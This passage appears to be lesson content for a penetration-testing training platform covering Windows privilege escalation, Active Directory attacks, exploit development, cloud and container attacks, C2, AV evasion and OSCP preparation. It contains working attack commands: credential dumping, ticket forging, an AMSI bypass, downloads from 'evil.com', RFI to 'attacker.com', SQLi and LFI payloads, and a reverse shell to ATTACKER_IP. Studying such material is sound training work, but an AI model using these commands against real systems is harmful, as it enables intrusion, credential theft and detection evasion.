tasklist /svc                      # Running services
netstat -ano                       # Network connections
\`\`\`

## Common Vectors
### Service Misconfigurations
\`\`\`powershell
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\\Windows\\"

# Weak service permissions
accesschk.exe -wuvc "Everyone" *
\`\`\`

### Token Impersonation (Potato Attacks)
- **SeImpersonatePrivilege** → JuicyPotato, PrintSpoofer, GodPotato
- Common on IIS, MSSQL, and service accounts

### AlwaysInstallElevated
\`\`\`powershell
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
# If both = 1, create malicious MSI → SYSTEM shell
\`\`\`

### Stored Credentials
\`\`\`powershell
cmdkey /list                       # Stored credentials
runas /savecred /user:admin cmd    # Use stored creds
\`\`\`

## Automated Tools
\`\`\`bash
# WinPEAS
winpeas.exe

# PowerUp
powershell -ep bypass -c "Import-Module .\\PowerUp.ps1; Invoke-AllChecks"
\`\`\``,

  "ad-attacks-intro": `## AD Attack Methodology

## Kill Chain for Active Directory
1. **Initial Access** — Phishing, exploiting public-facing apps, credential spraying
2. **Enumeration** — BloodHound, PowerView, ldapsearch
3. **Credential Harvesting** — Mimikatz, Responder, Kerberoasting
4. **Lateral Movement** — Pass-the-Hash, WMI, PSExec, WinRM
5. **Privilege Escalation** — DCSync, delegation abuse, ACL exploitation
6. **Domain Dominance** — Golden Ticket, ADCS abuse, persistence

## Key Concepts
- **Domain Controller** — The crown jewel. Compromise DC = own everything
- **KRBTGT** — The Kerberos service account. Its hash creates Golden Tickets
- **Service Accounts** — Often have weak passwords, high privileges
- **Group Policy** — Can push malware to all domain computers
- **NTDS.dit** — The AD database containing all password hashes

## Initial Enumeration
\`\`\`bash
# From Linux
enum4linux-ng target
ldapsearch -x -H ldap://DC -b "dc=domain,dc=com"
crackmapexec smb target -u '' -p ''   # Null session

# From Windows
net user /domain
net group "Domain Admins" /domain
\`\`\``,

  "bloodhound": `## BloodHound & AD Enumeration

## What is BloodHound?
BloodHound uses graph theory to reveal hidden relationships and attack paths in Active Directory that would be impossible to find manually.

## Data Collection
\`\`\`bash
# SharpHound (Windows — from compromised host)
.\\SharpHound.exe -c all

# BloodHound.py (Linux — remote collection)
bloodhound-python -d domain.com -u user -p pass -ns DC_IP -c all
\`\`\`

## Key Queries in BloodHound
- **Shortest Path to Domain Admin** — Most critical finding
- **Kerberoastable Users** — Service accounts with SPNs
- **AS-REP Roastable Users** — Accounts without pre-auth
- **Users with DCSync Rights** — Can dump all hashes
- **Dangerous Group Memberships** — Nested admin access

## Important AD Permissions to Look For
- **GenericAll** — Full control over the object
- **GenericWrite** — Modify attributes (set SPN for Kerberoasting)
- **WriteDACL** — Modify permissions on the object
- **ForceChangePassword** — Reset user's password
- **AddMember** — Add yourself to a group

## PowerView (Manual Enumeration)
\`\`\`powershell
Get-DomainUser -SPN                    # Kerberoastable users
Get-DomainUser -PreauthNotRequired     # AS-REP Roastable
Get-DomainGroupMember "Domain Admins"  # DA members
Find-DomainShare -CheckShareAccess     # Accessible shares
Get-DomainGPO | Select displayname     # Group policies
\`\`\``,

  "kerberos-attacks": `## Kerberos Attacks

## Kerberoasting
Request TGS tickets for service accounts, crack them offline.
\`\`\`bash
# From Linux
impacket-GetUserSPNs domain.com/user:pass -dc-ip DC_IP -request

# From Windows
Rubeus.exe kerberoast /outfile:hashes.txt

# Crack with Hashcat (mode 13100)
hashcat -m 13100 hashes.txt rockyou.txt
\`\`\`

## AS-REP Roasting
Target accounts with Kerberos pre-authentication disabled.
\`\`\`bash
# From Linux
impacket-GetNPUsers domain.com/ -dc-ip DC_IP -usersfile users.txt -no-pass

# Crack with Hashcat (mode 18200)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
\`\`\`

## Golden Ticket
Forge a TGT using the KRBTGT hash — unlimited domain access.
\`\`\`bash
# Requires KRBTGT hash (obtained via DCSync)
impacket-secretsdump domain.com/admin:pass@DC_IP
# Then forge ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.com Administrator
\`\`\`

## Silver Ticket
Forge a TGS for a specific service using the service account hash.
- More stealthy than Golden Ticket (doesn't contact DC)
- Limited to the specific service

## Delegation Attacks
- **Unconstrained Delegation** — Machine can impersonate ANY user
- **Constrained Delegation** — Limited to specific services (but exploitable)
- **Resource-Based Constrained Delegation (RBCD)** — Abusable with write access`,

  "lateral-movement": `## Lateral Movement & Persistence

## Lateral Movement Techniques
\`\`\`bash
# PSExec (Impacket)
impacket-psexec domain.com/admin:pass@target
impacket-psexec domain.com/admin@target -hashes :NTLM_HASH

# WMI Execution
impacket-wmiexec domain.com/admin:pass@target

# WinRM (Evil-WinRM)
evil-winrm -i target -u admin -p pass
evil-winrm -i target -u admin -H NTLM_HASH

# SMB (CrackMapExec)
crackmapexec smb target -u admin -p pass -x "whoami"

# Pass-the-Hash
crackmapexec smb target -u admin -H NTLM_HASH
\`\`\`

## Credential Extraction
\`\`\`bash
# Mimikatz (on compromised Windows host)
mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords    # Dump credentials from LSASS
mimikatz# lsadump::sam                 # Dump local SAM hashes
mimikatz# lsadump::dcsync /user:krbtgt # DCSync attack

# Remotely
impacket-secretsdump domain.com/admin:pass@target
\`\`\`

## Persistence Mechanisms
- **Golden Ticket** — Forged TGT, unlimited access until KRBTGT reset twice
- **Silver Ticket** — Forged TGS for specific service
- **Skeleton Key** — Backdoor password on DC (works alongside real passwords)
- **DCSync** — Extract any user's hash at will
- **AdminSDHolder** — Modify permissions that propagate to protected groups`,

  "ctf-platforms": `## CTF Platforms & Getting Started

## Top Practice Platforms

### HackTheBox (hackthebox.com)
- Realistic machines with varying difficulty
- Active and retired machines (retired require VIP for walkthroughs)
- Starting Point: guided beginner machines
- Pro Labs: multi-machine networks simulating real environments

### TryHackMe (tryhackme.com)
- Guided learning paths with room-based challenges
- Better for beginners (more hand-holding)
- Free tier available with many rooms
- Learning paths: Pre-Security, Jr Pentester, Offensive Pentesting

### PicoCTF (picoctf.org)
- Beginner-friendly CTF with permanent challenges
- Categories: Web, Forensics, Crypto, Binary, Reverse Engineering
- Great for learning fundamentals

### VulnHub (vulnhub.com)
- Downloadable vulnerable VMs
- Run locally in VirtualBox/VMware
- Community walkthroughs available

## CTF Categories
- **Web** — SQLi, XSS, SSRF, file inclusion, authentication bypass
- **Pwn/Binary** — Buffer overflows, format strings, ROP
- **Reverse Engineering** — Analyze binaries to find flags
- **Crypto** — Break weak encryption, decode ciphers
- **Forensics** — Analyze disk images, PCAPs, memory dumps
- **OSINT** — Find information from public sources`,

  "ctf-methodology": `## Pentesting Methodology

## Systematic Approach
1. **Reconnaissance** — OSINT, passive information gathering
2. **Scanning** — Port scanning, service enumeration
3. **Enumeration** — Deep-dive into each service
4. **Exploitation** — Gain initial access
5. **Post-Exploitation** — Escalate privileges, pivot
6. **Reporting** — Document findings with evidence

## Per-Service Enumeration
\`\`\`
Port 21 (FTP)   → Anonymous login? Version exploit?
Port 22 (SSH)   → Brute force? Key-based auth? Version?
Port 25 (SMTP)  → User enumeration? Open relay?
Port 80/443     → Directory busting, CMS scan, source code
Port 139/445    → SMB shares? Null session? EternalBlue?
Port 3306       → MySQL? Default creds? UDF exploit?
Port 3389       → RDP? BlueKeep? Brute force?
Port 5985       → WinRM? Evil-WinRM with creds
\`\`\`

## Key Resources
- **HackTricks** (book.hacktricks.wiki) — The pentester's bible
- **PayloadsAllTheThings** — Payload reference for every vulnerability
- **GTFOBins** — Unix binaries for privilege escalation
- **LOLBAS** — Windows Living Off the Land binaries
- **RevShells** (revshells.com) — Reverse shell generator`,

  // ═══════════════════════════════════════════
  // SPECIALIST — Malware Analysis
  // ═══════════════════════════════════════════

  "malware-fundamentals": `## Malware Analysis Fundamentals

## Malware Types
- **Virus** — Self-replicating, attaches to files
- **Worm** — Self-propagating across networks
- **Trojan** — Disguised as legitimate software
- **Ransomware** — Encrypts files, demands payment
- **RAT** — Remote Access Trojan for persistent control
- **Rootkit** — Hides at OS/kernel level
- **Keylogger** — Records keystrokes
- **Cryptominer** — Uses victim's resources for cryptocurrency mining

## Analysis Types
- **Static Analysis** — Examine without executing (strings, headers, disassembly)
- **Dynamic Analysis** — Execute in sandbox, observe behavior
- **Hybrid** — Combine both for complete picture

## Safe Analysis Environment
1. **Isolated VM** — No network access to real systems
2. **Snapshots** — Revert after each analysis
3. **REMnux** — Linux distro for malware analysis
4. **FlareVM** — Windows distro with analysis tools
5. **Any.run** — Cloud-based interactive sandbox

## Initial Triage Checklist
\`\`\`bash
file sample.exe                    # File type identification
sha256sum sample.exe               # Generate hash for VT lookup
strings sample.exe | head -50      # Extract readable strings
strings sample.exe | grep -i "http\\|ftp\\|cmd\\|powershell"
pestudio sample.exe                # PE analysis (Windows)
\`\`\``,

  "static-analysis": `## Static Analysis & Reverse Engineering

## PE Header Analysis
\`\`\`
Key PE sections:
.text    — Executable code
.data    — Initialized data
.rdata   — Read-only data (strings, imports)
.rsrc    — Resources (icons, embedded files)
.reloc   — Relocation information
\`\`\`

## Suspicious Indicators
- Unusual section names or sizes
- High entropy (packed/encrypted)
- RWX (Read/Write/Execute) sections
- Few imports (may resolve dynamically)
- Suspicious imports: VirtualAlloc, WriteProcessMemory, CreateRemoteThread

## Ghidra Workflow
1. Create new project, import the binary
2. Auto-analyze when prompted
3. Navigate to entry point (main function)
4. Examine function calls and cross-references
5. Rename functions and variables as you understand them
6. Look for: string references, API calls, crypto constants

## Key API Calls to Look For
\`\`\`
Process Injection:  VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
Persistence:        RegSetValueEx, CreateService, CopyFile
Networking:         WSAStartup, connect, send, recv, InternetOpen
Anti-Analysis:      IsDebuggerPresent, CheckRemoteDebuggerPresent
File Operations:    CreateFile, ReadFile, WriteFile, DeleteFile
Crypto:             CryptEncrypt, CryptDecrypt
\`\`\``,

  "dynamic-analysis": `## Dynamic & Behavioral Analysis

## Sandbox Analysis
Execute malware in a controlled environment and observe:
- File system changes (created, modified, deleted files)
- Registry modifications
- Network connections (C2 communication)
- Process creation and injection
- API calls made

## Tools
- **Process Monitor (ProcMon)** — Real-time file, registry, process activity
- **Process Explorer** — Advanced task manager with process details
- **Wireshark** — Capture network traffic
- **Regshot** — Registry before/after comparison
- **x64dbg/x32dbg** — Dynamic debugging
- **API Monitor** — Hook and log API calls

## Dynamic Analysis Workflow
1. Take VM snapshot (clean state)
2. Start monitoring tools (ProcMon, Wireshark, Regshot "1st shot")
3. Execute the malware
4. Wait 5-10 minutes for full behavior
5. Take Regshot "2nd shot" and compare
6. Stop ProcMon capture and analyze
7. Export Wireshark PCAP for analysis
8. Revert to snapshot

## Behavioral Red Flags
- Creates files in Temp, AppData, or System32
- Modifies Run keys or creates scheduled tasks
- Connects to external IPs/domains on unusual ports
- Spawns child processes (cmd.exe, powershell.exe)
- Disables Windows Defender or other security tools
- Attempts to access LSASS (credential theft)`,

  // ═══════════════════════════════════════════
  // SPECIALIST — Exploit Dev
  // ═══════════════════════════════════════════

  "buffer-overflows": `## Buffer Overflows

## Stack Layout
\`\`\`
High Address  ┌──────────────┐
              │   Arguments  │
              ├──────────────┤
              │ Return Addr  │ ← EIP (we want to overwrite this)
              ├──────────────┤
              │  Saved EBP   │
              ├──────────────┤
              │              │
              │   Buffer     │ ← Our input goes here
              │              │
Low Address   └──────────────┘
\`\`\`

## Exploitation Steps
1. **Fuzz** — Send increasing amounts of data to crash the program
2. **Find offset** — Determine exact bytes to reach EIP (pattern_create/pattern_offset)
3. **Control EIP** — Verify you can overwrite EIP with a specific value
4. **Find bad characters** — Test which bytes get mangled (\\x00 is always bad)
5. **Find JMP ESP** — Locate a JMP ESP instruction in a non-ASLR module
6. **Generate shellcode** — msfvenom with bad chars excluded
7. **Exploit** — Overflow + padding + JMP ESP address + NOP sled + shellcode

## Key Commands
\`\`\`bash
# Generate pattern
msf-pattern_create -l 2000

# Find offset
msf-pattern_offset -l 2000 -q 386F4337

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\\x00" -f python

# In Python exploit
buffer = b"A" * offset
buffer += struct.pack("<I", jmp_esp_address)  # Little-endian
buffer += b"\\x90" * 16  # NOP sled
buffer += shellcode
\`\`\``,

  "rop-chains": `## Return-Oriented Programming (ROP)

## Why ROP?
DEP (Data Execution Prevention) prevents executing code on the stack. ROP bypasses this by chaining existing code snippets.

## Key Concepts
- **Gadget** — A short instruction sequence ending in \`ret\`
- **ROP Chain** — Sequence of gadget addresses on the stack
- Each \`ret\` pops the next gadget address and jumps to it

## Finding Gadgets
\`\`\`bash
# ROPgadget
ROPgadget --binary program --only "pop|ret"
ROPgadget --binary program --ropchain

# ropper
ropper -f program --search "pop rdi"
\`\`\`

## Common ROP Patterns
\`\`\`
# Call system("/bin/sh") on 64-bit Linux
pop rdi; ret          # Load address of "/bin/sh" into RDI
address of "/bin/sh"  # First argument
ret                   # Stack alignment (if needed)
address of system()   # Call system()
\`\`\`

## Protections & Bypasses
- **ASLR** → Information leak to find base addresses
- **DEP/NX** → ROP chains
- **Stack Canary** → Leak or brute-force the canary value
- **PIE** → Need info leak for binary base address
- **RELRO** → Can't overwrite GOT entries (if full RELRO)`,

  "pwntools": `## Exploit Development with pwntools

## Basic Template
\`\`\`python
from pwn import *

# Connect to target
p = remote('target.com', 1337)  # Remote
# p = process('./binary')       # Local

# Receive data
p.recvuntil(b'Enter input: ')

# Send payload
payload = b'A' * 40
payload += p64(0xdeadbeef)  # 64-bit address
p.sendline(payload)

# Interactive shell
p.interactive()
\`\`\`

## Useful Functions
\`\`\`python
# Pack addresses
p32(0x08041234)    # 32-bit little-endian
p64(0x00401234)    # 64-bit little-endian

# ELF analysis
elf = ELF('./binary')
elf.symbols['main']           # Address of main
elf.got['puts']               # GOT entry for puts
elf.plt['system']             # PLT entry for system
next(elf.search(b'/bin/sh'))  # Find string in binary

# ROP chains
rop = ROP(elf)
rop.call('system', [next(elf.search(b'/bin/sh'))])
print(rop.dump())

# Shellcraft
shellcode = asm(shellcraft.sh())  # Linux /bin/sh
shellcode = asm(shellcraft.cat('/flag'))  # Read file
\`\`\``,

  // ═══════════════════════════════════════════
  // SPECIALIST — Cloud Security
  // ═══════════════════════════════════════════

  "cloud-fundamentals": `## Cloud Security Fundamentals

## Shared Responsibility Model
- **Cloud Provider** — Security OF the cloud (physical, network, hypervisor)
- **Customer** — Security IN the cloud (data, IAM, configuration, encryption)

## AWS Security Essentials
- **IAM** — Users, groups, roles, policies (principle of least privilege)
- **VPC** — Virtual Private Cloud (network isolation)
- **Security Groups** — Instance-level firewall (stateful)
- **NACLs** — Subnet-level firewall (stateless)
- **S3** — Object storage (watch for public buckets!)
- **CloudTrail** — API call logging (who did what)
- **GuardDuty** — Threat detection service
- **KMS** — Key Management Service for encryption

## Common Cloud Misconfigurations
1. Public S3 buckets / Azure Blob storage
2. Overly permissive IAM policies (Admin access for apps)
3. Exposed management ports (SSH, RDP to 0.0.0.0/0)
4. Unencrypted data at rest or in transit
5. Missing logging (CloudTrail disabled)
6. IMDSv1 enabled (SSRF risk)
7. Hardcoded credentials in Lambda/code`,

  "cloud-pentesting": `## Cloud Penetration Testing

## AWS Enumeration
\`\`\`bash
# Enumerate S3 buckets
aws s3 ls s3://bucket-name --no-sign-request
aws s3 ls s3://company-backup --no-sign-request

# Enumerate IAM (with creds)
aws iam get-user
aws iam list-users
aws iam list-roles
aws iam list-attached-user-policies --user-name target

# Check EC2 instances
aws ec2 describe-instances
\`\`\`

## SSRF to Cloud Metadata
\`\`\`
# AWS IMDSv1 (if not disabled)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# GCP
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
\`\`\`

## Tools
- **Pacu** — AWS exploitation framework (the Metasploit of AWS)
- **ScoutSuite** — Multi-cloud security auditing
- **Prowler** — AWS security assessment
- **CloudGoat** — Vulnerable AWS deployment for practice`,

  "container-security": `## Container & Kubernetes Security

## Docker Security
\`\`\`bash
# Check if running in container
cat /proc/1/cgroup     # Look for /docker or /lxc
ls -la /.dockerenv      # Exists in containers

# Docker socket exposed = root on host
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt
\`\`\`

## Container Escape Techniques
- **Privileged containers** — Full host access
- **Docker socket mount** — Create containers on the host
- **Kernel exploits** — Escape through shared kernel
- **Sensitive mounts** — Host filesystem mounted in container
- **Cap_sys_admin** — Near-root capabilities

## Kubernetes Security
\`\`\`bash
# Check permissions
kubectl auth can-i --list
kubectl auth can-i create pods

# List secrets
kubectl get secrets -A
kubectl get secret SECRET_NAME -o jsonpath='{.data}'

# Pod escape indicators
env | grep KUBERNETES   # K8s environment variables
cat /var/run/secrets/kubernetes.io/serviceaccount/token  # Service account token
\`\`\`

## Kubernetes Attack Vectors
- Exposed API server (port 6443/8443)
- Default service account with excessive permissions
- Misconfigured RBAC
- Privileged pods (hostPID, hostNetwork, privileged: true)
- Writable hostPath mounts`,

  // ═══════════════════════════════════════════
  // SPECIALIST — C2 & Adversary Emulation
  // ═══════════════════════════════════════════

  "c2-frameworks": `## Command & Control Frameworks

## What is C2?
A system for remotely controlling compromised machines, consisting of:
- **Server** — Attacker's management console
- **Implant/Agent** — Payload running on victim
- **Listener** — Receives connections from implants
- **Communication Channel** — HTTP(S), DNS, SMB, etc.

## Popular C2 Frameworks

### Sliver (Open Source — Bishop Fox)
\`\`\`bash
# Generate implant
sliver > generate --http 10.10.14.2 --os windows

# Start listener
sliver > http -l 443

# After connection
sliver > sessions     # List sessions
sliver > use SESSION  # Interact
sliver > shell        # Get shell
sliver > upload /local/file /remote/path
\`\`\`

### Mythic (Open Source)
- Web-based UI for C2 management
- Multiple payload types (agents)
- Extensive logging and OPSEC features

### Cobalt Strike (Commercial)
- Industry standard for red teams
- Beacon implant with extensive features
- Malleable C2 profiles for traffic customization

## C2 Communication Channels
- **HTTP/HTTPS** — Blends with normal web traffic
- **DNS** — Very stealthy, slow bandwidth
- **SMB** — Internal pivoting via named pipes
- **DoH (DNS over HTTPS)** — Encrypted DNS for C2`,

  "evasion": `## AV/EDR Evasion

## How AV/EDR Detects Threats
- **Signature-based** — Known malware patterns/hashes
- **Heuristic** — Suspicious behavior patterns
- **Behavioral** — Runtime monitoring (API calls, process injection)
- **AMSI** — Scans PowerShell, VBScript, JavaScript at runtime
- **ETW** — Event Tracing for Windows feeds EDR

## Evasion Techniques

### AMSI Bypass
\`\`\`powershell
# Patch AMSI in memory (simplified concept)
# Modifies AmsiScanBuffer to return clean result
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
\`\`\`

### Payload Obfuscation
- **Encoding** — Base64, XOR encryption
- **Custom loaders** — Write your own shellcode loader in C/C#/Rust
- **Process injection** — Inject into legitimate processes
- **Syscall-based execution** — Call NT APIs directly, bypassing hooks
- **Sleep obfuscation** — Encrypt payload in memory while sleeping

### Living Off the Land (LOLBins)
\`\`\`bash
# Use legitimate Windows tools for malicious purposes
certutil -urlcache -split -f http://evil.com/payload.exe
mshta http://evil.com/payload.hta
rundll32 javascript:"\\..\\mshtml,RunHTMLApplication";alert('test')
\`\`\`

## Key Principle
Modern evasion is about blending in, not hiding. Use legitimate tools, signed binaries, and normal-looking traffic patterns.`,

  "threat-emulation": `## Threat Actor Emulation with ATT&CK

## What is Adversary Emulation?
Simulating real threat actor TTPs to test your organization's detection and response capabilities.

## MITRE ATT&CK-Based Approach
1. **Select Threat Actor** — Choose relevant to your industry
2. **Research TTPs** — Map their known techniques to ATT&CK
3. **Build Emulation Plan** — Step-by-step procedure
4. **Execute** — Run the emulation in a controlled manner
5. **Measure** — Which techniques were detected? Which weren't?
6. **Improve** — Build detections for gaps

## Atomic Red Team
Library of small, focused tests for individual ATT&CK techniques.
\`\`\`bash
# Install
Install-Module -Name AtomicRedTeam

# Run a specific technique test
Invoke-AtomicTest T1059.001    # PowerShell execution
Invoke-AtomicTest T1053.005    # Scheduled task persistence
Invoke-AtomicTest T1003.001    # LSASS memory dump
\`\`\`

## MITRE CALDERA
Automated adversary emulation platform:
- AI-driven decision engine
- Automatically chains techniques
- Blue team can use it to test detections
- Supports custom plugins and agents

## Purple Teaming
Red team executes techniques while blue team watches:
- Run technique → Check if SIEM alerted → If not, build detection
- Iterate until detection coverage is comprehensive
- Document everything in ATT&CK Navigator layers`,

  // ═══════════════════════════════════════════
  // OSCP PREP
  // ═══════════════════════════════════════════

  "oscp-exam-overview": `## OSCP Exam Structure

## Exam Format
- **Duration**: 23 hours 45 minutes for hacking + 24 hours for report
- **Total points**: 100
- **Passing score**: 70 points
- **3 standalone machines**: 20 points each (60 total)
  - 10 points for initial access (local.txt)
  - 10 points for privilege escalation (proof.txt)
- **1 Active Directory set**: 40 points (3 machines)
  - All-or-nothing: must compromise the full chain

## Tool Restrictions
- **Metasploit**: Allowed on ONLY ONE standalone machine
- **Restricted tools**: SQLMap, auto-exploitation tools
- **Allowed**: Nmap, Gobuster, Burp (Community), manual exploitation

## Bonus Points
- Complete 80% of course exercises in PEN-200 = 10 bonus points
- Can make the difference between pass and fail

## Exam Day Tips
1. Start with the AD set (40 points, all-or-nothing)
2. Enumerate ALL machines before exploiting any
3. Take breaks — fatigue causes mistakes
4. Screenshot EVERYTHING as you go
5. Keep detailed notes for the report
6. If stuck for 30+ minutes, move to another machine`,

  "oscp-report-writing": `## OSCP Exam Report

## Report Requirements
- Must be submitted within 24 hours after the exam ends
- Must be a PDF document
- Must include step-by-step reproduction instructions
- Must include screenshots showing proof hashes
- Missing the report deadline = automatic fail

## Report Structure
1. **Executive Summary** — High-level overview of findings
2. **Methodology** — Tools and approach used
3. **Per-Machine Sections**:
   - IP address and hostname
   - Service enumeration results
   - Vulnerability identification
   - Exploitation steps (detailed, reproducible)
   - Screenshots of each step
   - Proof hash screenshot (local.txt / proof.txt)
   - Post-exploitation findings
   - Remediation recommendations

## Screenshot Requirements
- Each screenshot must show the proof hash
- Must show the IP address of the target
- Must be taken from the target machine (not your attacker)
- Commands used must be visible

## Report Templates
- Official OffSec template (recommended)
- noraj's Markdown template (GitHub)
- Generate professional PDF from Markdown with pandoc`,

  "oscp-note-taking": `## Note-Taking & Documentation

## During the Exam
Take notes in real-time — don't rely on memory after 24 hours.

## Recommended Structure
\`\`\`
Machine: 10.10.10.X
├── Enumeration
│   ├── Nmap results
│   ├── Web enumeration
│   └── Service-specific findings
├── Exploitation
│   ├── Vulnerability identified
│   ├── Exploit used
│   ├── Commands run (copy/paste exact commands)
│   └── Screenshot: initial shell with local.txt
├── Privilege Escalation
│   ├── Enumeration (LinPEAS/WinPEAS output)
│   ├── Vector identified
│   ├── Exploitation steps
│   └── Screenshot: root/admin shell with proof.txt
└── Post-Exploitation
    └── Credentials, interesting files
\`\`\`

## Tools
- **CherryTree** — Hierarchical notes with screenshots
- **Obsidian** — Markdown with linking
- **Notion** — Web-based, templates available

## Tips
- Copy/paste every command you run
- Take screenshots at every significant step
- Note timestamps for timeline in report
- Save all tool output to files`,

  "oscp-scanning": `## Port Scanning & Service Detection (OSCP)

## Standard Methodology
\`\`\`bash
# Initial fast scan
nmap -sC -sV -oN nmap/initial $IP

# Full TCP port scan
nmap -p- --min-rate 5000 -oN nmap/allports $IP

# Detailed scan on discovered ports
nmap -sC -sV -p PORT1,PORT2,PORT3 -oN nmap/detailed $IP

# UDP scan (top 20)
sudo nmap -sU --top-ports 20 -oN nmap/udp $IP
\`\`\`

## AutoRecon (Automated Enumeration)
\`\`\`bash
autorecon $IP
# Runs nmap + service-specific enumeration automatically
# Output organized in results/ directory
\`\`\`

## Per-Port Follow-Up
\`\`\`
Port 21 (FTP)  → ftp $IP (try anonymous login)
Port 22 (SSH)  → Note version, try creds later
Port 25 (SMTP) → smtp-user-enum -M VRFY -U users.txt -t $IP
Port 53 (DNS)  → dig axfr @$IP domain.com (zone transfer)
Port 80/443    → Browser + gobuster + nikto
Port 110 (POP3)→ telnet $IP 110
Port 139/445   → smbclient -L //$IP/ -N; enum4linux $IP
Port 161 (SNMP)→ snmpwalk -v2c -c public $IP
Port 3306      → mysql -h $IP -u root
Port 5985      → evil-winrm -i $IP -u user -p pass
\`\`\``,

  "oscp-web-enum": `## Web Application Enumeration (OSCP)

## Initial Steps
\`\`\`bash
# 1. Browse the site manually first
# 2. Check source code for comments, hidden paths, versions
# 3. Check robots.txt, sitemap.xml

# Directory brute-forcing
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak

# With feroxbuster (recursive)
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html

# Technology identification
whatweb http://$IP
\`\`\`

## CMS-Specific
\`\`\`bash
# WordPress
wpscan --url http://$IP --enumerate u,vp,vt --api-token YOUR_TOKEN

# Joomla
joomscan -u http://$IP

# Drupal
droopescan scan drupal -u http://$IP
\`\`\`

## Things to Check
- Default credentials for identified applications
- Version numbers → searchsploit for exploits
- File upload functionality → test for web shell upload
- Input fields → test for SQLi, XSS, command injection
- Parameters in URLs → test for LFI, SSRF
- /cgi-bin/ → test for Shellshock`,

  "oscp-smb-enum": `## SMB, SNMP & Service Enumeration

## SMB (Ports 139/445)
\`\`\`bash
# List shares
smbclient -L //$IP/ -N                    # Null session
smbclient -L //$IP/ -U 'user%password'    # With creds

# Connect to share
smbclient //$IP/share_name -N

# Enumerate with enum4linux
enum4linux -a $IP

# CrackMapExec
crackmapexec smb $IP -u '' -p '' --shares  # Null session
crackmapexec smb $IP -u user -p pass --shares

# Check for vulnerabilities
nmap --script smb-vuln* -p 445 $IP
\`\`\`

## SNMP (Port 161 UDP)
\`\`\`bash
# Enumerate with default community string
snmpwalk -v2c -c public $IP

# Enumerate specific OIDs
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.2  # Running processes
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.6.3.1.2  # Installed software

# Brute-force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $IP
\`\`\`

## NFS (Port 2049)
\`\`\`bash
showmount -e $IP                   # List exports
mount -t nfs $IP:/share /mnt/nfs   # Mount share
\`\`\``,

  "oscp-sqli-manual": `## Manual SQL Injection (OSCP)

## Remember: SQLMap is RESTRICTED on the OSCP exam. You must know manual SQLi.

## Detection
\`\`\`
' OR 1=1--          Add to parameters, look for behavior change
' OR '1'='1         String-based test
1 AND 1=1           Boolean test (should return normal)
1 AND 1=2           Boolean test (should change behavior)
\`\`\`

## UNION-Based SQLi (Step by Step)
\`\`\`sql
-- 1. Find column count
' ORDER BY 1-- (increment until error)

-- 2. Find displayable columns
' UNION SELECT 1,2,3--

-- 3. Extract data
' UNION SELECT 1,version(),3--
' UNION SELECT 1,user(),database()--
' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,username,password FROM users--
\`\`\`

## Blind SQLi
\`\`\`sql
-- Boolean-based
' AND SUBSTRING(database(),1,1)='a'--
' AND (SELECT COUNT(*) FROM users)>0--

-- Time-based
' AND SLEEP(5)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
\`\`\`

## Authentication Bypass
\`\`\`sql
admin' OR 1=1--
admin'--
' OR 1=1--
' OR '1'='1
\`\`\``,

  "oscp-lfi-rfi": `## File Inclusion & Directory Traversal

## Local File Inclusion (LFI)
\`\`\`
# Basic LFI
http://target/page?file=../../../../etc/passwd
http://target/page?file=..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts

# Null byte (older PHP)
http://target/page?file=../../../../etc/passwd%00

# PHP Wrappers
http://target/page?file=php://filter/convert.base64-encode/resource=index.php
http://target/page?file=php://input  (POST data as PHP code)
http://target/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
\`\`\`

## LFI to RCE
\`\`\`
# Log poisoning (Apache)
1. Inject PHP into User-Agent: <?php system($_GET['cmd']); ?>
2. Include the log: ?file=../../../../var/log/apache2/access.log&cmd=id

# SSH log poisoning
1. ssh '<?php system($_GET["cmd"]); ?>'@target
2. Include: ?file=../../../../var/log/auth.log&cmd=id

# /proc/self/environ
?file=../../../../proc/self/environ  (inject via User-Agent)
\`\`\`

## Remote File Inclusion (RFI)
\`\`\`
# Requires allow_url_include = On in php.ini
http://target/page?file=http://attacker.com/shell.php
\`\`\`

## Key Files to Read
\`\`\`
Linux:  /etc/passwd, /etc/shadow, /home/user/.ssh/id_rsa
Windows: C:\\Windows\\System32\\drivers\\etc\\hosts
         C:\\inetpub\\wwwroot\\web.config
         C:\\Users\\Administrator\\.ssh\\id_rsa
\`\`\``,

  "oscp-cmd-injection": `## Command Injection & File Upload

## Command Injection
\`\`\`
# Common injection characters
; id                    # Command separator
| id                    # Pipe
|| id                   # OR (executes if first fails)
&& id                   # AND (executes if first succeeds)
\`id\`                  # Backtick substitution
$(id)                   # Command substitution
\`\`\`

## Reverse Shell from Command Injection
\`\`\`bash
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
